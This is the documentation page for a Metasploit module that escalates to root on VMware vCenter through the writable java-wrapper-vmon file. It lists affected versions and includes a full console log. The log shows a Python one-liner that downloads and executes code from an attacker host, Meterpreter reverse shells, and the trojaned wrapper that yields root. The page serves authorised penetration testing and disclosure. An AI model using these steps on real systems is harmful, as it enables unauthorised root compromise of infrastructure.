## Vulnerable Application

This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
`/usr/lib/vmware-vmon/java-wrapper-vmon` file. It is possible for anyone in the
`cis` group to write to the file, which will execute as root on `vmware-vmon` service
restart or host reboot.

This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.

The following versions should be vulnerable:
 - vCenter 7.0 before U2c
 - vCenter 6.7 before U3o
 - vCenter 6.5 before U3q

## Verification Steps

1. Start msfconsole
2. Obtain a shell on vCenter for a user in the `cis` group.
3. Do: `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
4. Do: `set session #`
5. Do: `run`
6. Restart the host, or the service (`systemctl restart vmware-vmon.service`) with a user who has permission
7. You should get a root shell.

## Options

## Scenarios

### VMware VirtualCenter 6.5.0 build-7070488

Get initial shell (any vic group member will do, here we use vsphere-client)

```
[*] Processing java_wrapper.rb for ERB directives.
resource (java_wrapper.rb)> use multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (java_wrapper.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (java_wrapper.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Using URL: http://2.2.2.2:8080/cFK3ylrNE9s
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://2.2.2.2:8080/cFK3ylrNE9s', context=ssl._create_unverified_context());exec(r.read());"
msf exploit(multi/script/web_delivery) > 
[*] 1.1.1.1    web_delivery - Delivering Payload (432 bytes)
[*] Sending stage (24380 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:59084) at 2022-11-20 10:45:06 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: vsphere-client
meterpreter > sysinfo
Computer        : localhost.ragedomain
OS              : Linux 4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > shell
Process 6710 created.
Channel 1 created.
vpxd -v
/usr/sbin/vpxd: line 34: ulimit: open files: cannot modify limit: Operation not permitted
sed: couldn't open temporary file /etc/vmware-vpx/sedXf9kV4: Permission denied
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background channel 1? [y/N]  y
meterpreter > background
[*] Backgrounding session 1...
```

Conduct the priv esc

```
msf exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
session => 1
msf exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /root/.msf4/loot/20221120104723_default_1.1.1.1_javawrappervmo_605726.txt
[*] Writing payload to /tmp/.BCOL6n
[*] Writing '/tmp/.BCOL6n' (250 bytes) ...
[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
[*] Attempting to restart vmware-vmon service
[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
[*] Waiting 1800 seconds for shell
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 1.1.1.1
[+] Deleted /tmp/.BCOL6n
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:32906) at 2022-11-20 10:47:52 -0500
[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original

meterpreter > getuid
Server username: root
meterpreter > 
```
